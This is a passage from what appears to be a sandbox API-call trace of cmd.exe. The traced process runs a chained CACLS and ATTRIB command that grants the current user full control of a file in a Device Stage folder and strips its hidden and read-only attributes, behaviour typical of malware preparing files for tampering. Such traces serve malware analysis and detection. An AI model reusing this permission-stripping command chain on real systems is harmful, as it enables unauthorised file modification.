lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.135] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fd04, dwLength=0x1c | out: lpBuffer=0x14fd04*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0149.135] GetConsoleOutputCP () returned 0x1b5 [0149.135] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.135] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0149.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.135] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0149.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.135] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.136] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.136] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.136] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.136] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.136] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.136] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0149.136] GetEnvironmentStringsW () returned 0x170380* [0149.136] FreeEnvironmentStringsW (penv=0x170380) returned 1 [0149.136] GetEnvironmentStringsW () returned 0x170380* [0149.136] FreeEnvironmentStringsW (penv=0x170380) returned 1 [0149.137] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eca4 | out: phkResult=0x14eca4*=0x40) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x30, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x0, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegCloseKey (hKey=0x40) returned 0x0 [0149.137] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14eca4 | out: phkResult=0x14eca4*=0x40) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x40, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x1, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x0, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x9, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x4, lpData=0x14ecb0*=0x9, lpcbData=0x14eca8*=0x4) returned 0x0 [0149.137] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ecac, lpData=0x14ecb0, lpcbData=0x14eca8*=0x1000 | out: lpType=0x14ecac*=0x0, lpData=0x14ecb0*=0x9, lpcbData=0x14eca8*=0x1000) returned 0x2 [0149.137] RegCloseKey (hKey=0x40) returned 0x0 [0149.137] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886377 [0149.137] srand (_Seed=0x5b886377) [0149.137] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" [0149.138] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"" [0149.138] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.138] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x171ae0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0149.138] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.138] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.138] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.138] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.138] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.138] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.138] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.138] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.138] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.139] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.139] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.139] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.139] GetEnvironmentStringsW () returned 0x1724d0* [0149.139] FreeEnvironmentStringsW (penv=0x1724d0) returned 1 [0149.139] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.139] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.139] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.139] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.139] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.139] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.139] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.139] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.139] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.139] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.139] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14fa70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.139] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14fa70, lpFilePart=0x14fa6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14fa6c*="Desktop") returned 0x18 [0149.139] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.139] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f7ec | out: lpFindFileData=0x14f7ec) returned 0x170b60 [0149.140] FindClose (in: hFindFile=0x170b60 | out: hFindFile=0x170b60) returned 1 [0149.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f7ec | out: lpFindFileData=0x14f7ec) returned 0x170b60 [0149.140] FindClose (in: hFindFile=0x170b60 | out: hFindFile=0x170b60) returned 1 [0149.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f7ec | out: lpFindFileData=0x14f7ec) returned 0x170b60 [0149.140] FindClose (in: hFindFile=0x170b60 | out: hFindFile=0x170b60) returned 1 [0149.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.140] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0149.140] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0149.140] GetEnvironmentStringsW () returned 0x170380* [0149.140] FreeEnvironmentStringsW (penv=0x170380) returned 1 [0149.140] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.141] GetConsoleOutputCP () returned 0x1b5 [0149.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.141] GetUserDefaultLCID () returned 0x409 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fbb0, cchData=128 | out: lpLCData="0") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fbb0, cchData=128 | out: lpLCData="0") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fbb0, cchData=128 | out: lpLCData="1") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.141] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0149.142] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0149.142] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.142] GetConsoleTitleW (in: lpConsoleTitle=0x160a08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.143] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0149.143] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0149.143] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0149.143] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0149.144] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0149.144] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0149.144] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0149.144] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0149.144] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0149.144] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0149.144] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0149.193] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0149.193] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0149.193] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0149.193] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0149.193] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0149.193] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0149.193] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0149.197] SetErrorMode (uMode=0x0) returned 0x0 [0149.197] SetErrorMode (uMode=0x1) returned 0x0 [0149.197] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x172028, lpFilePart=0x14f364 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f364*="Desktop") returned 0x18 [0149.197] SetErrorMode (uMode=0x0) returned 0x1 [0149.197] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.197] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.202] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.202] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.203] GetLastError () returned 0x2 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.203] GetLastError () returned 0x2 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x160f68 [0149.203] FindClose (in: hFindFile=0x160f68 | out: hFindFile=0x160f68) returned 1 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.203] GetLastError () returned 0x2 [0149.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x160f68 [0149.204] FindClose (in: hFindFile=0x160f68 | out: hFindFile=0x160f68) returned 1 [0149.204] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.204] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.204] GetConsoleTitleW (in: lpConsoleTitle=0x14f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.204] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f460, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f528 | out: lpAttributeList=0x14f460, lpSize=0x14f528) returned 1 [0149.204] UpdateProcThreadAttribute (in: lpAttributeList=0x14f460, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f520, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f460, lpPreviousValue=0x0) returned 1 [0149.204] GetStartupInfoW (in: lpStartupInfo=0x14f41c | out: lpStartupInfo=0x14f41c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.204] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.205] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f4bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f508 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x14f508*(hProcess=0x50, hThread=0x4c, dwProcessId=0xca4, dwThreadId=0xc24)) returned 1 [0149.207] CloseHandle (hObject=0x4c) returned 1 [0149.207] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.207] GetEnvironmentStringsW () returned 0x1704f0* [0149.208] FreeEnvironmentStringsW (penv=0x1704f0) returned 1 [0149.208] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0149.395] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14f3fc | out: lpExitCode=0x14f3fc*=0x0) returned 1 [0149.395] CloseHandle (hObject=0x50) returned 1 [0149.395] _vsnwprintf (in: _Buffer=0x14f544, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f408 | out: _Buffer="00000000") returned 8 [0149.395] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0149.395] GetEnvironmentStringsW () returned 0x172320* [0149.395] FreeEnvironmentStringsW (penv=0x172320) returned 1 [0149.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.395] GetEnvironmentStringsW () returned 0x172320* [0149.396] FreeEnvironmentStringsW (penv=0x172320) returned 1 [0149.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f460 | out: lpAttributeList=0x14f460) [0149.396] GetConsoleTitleW (in: lpConsoleTitle=0x14f844, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.396] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.396] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0149.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.396] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.396] GetLastError () returned 0x2 [0149.396] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.397] GetLastError () returned 0x2 [0149.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x16e550 [0149.397] FindClose (in: hFindFile=0x16e550 | out: hFindFile=0x16e550) returned 1 [0149.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0xffffffff [0149.397] GetLastError () returned 0x2 [0149.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14f0e0) returned 0x16e550 [0149.397] FindClose (in: hFindFile=0x16e550 | out: hFindFile=0x16e550) returned 1 [0149.397] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0149.397] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0149.397] GetConsoleTitleW (in: lpConsoleTitle=0x14f5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.397] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f460, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f528 | out: lpAttributeList=0x14f460, lpSize=0x14f528) returned 1 [0149.397] UpdateProcThreadAttribute (in: lpAttributeList=0x14f460, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f520, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f460, lpPreviousValue=0x0) returned 1 [0149.397] GetStartupInfoW (in: lpStartupInfo=0x14f41c | out: lpStartupInfo=0x14f41c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0149.397] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0149.397] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f4bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f508 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png\"", lpProcessInformation=0x14f508*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa14, dwThreadId=0x5fc)) returned 1 [0149.399] CloseHandle (hObject=0x50) returned 1 [0149.399] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0149.399] GetEnvironmentStringsW () returned 0x172480* [0149.399] FreeEnvironmentStringsW (penv=0x172480) returned 1 [0149.399] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0149.439] GetExitCodeProcess (in: hProcess=0x4c, 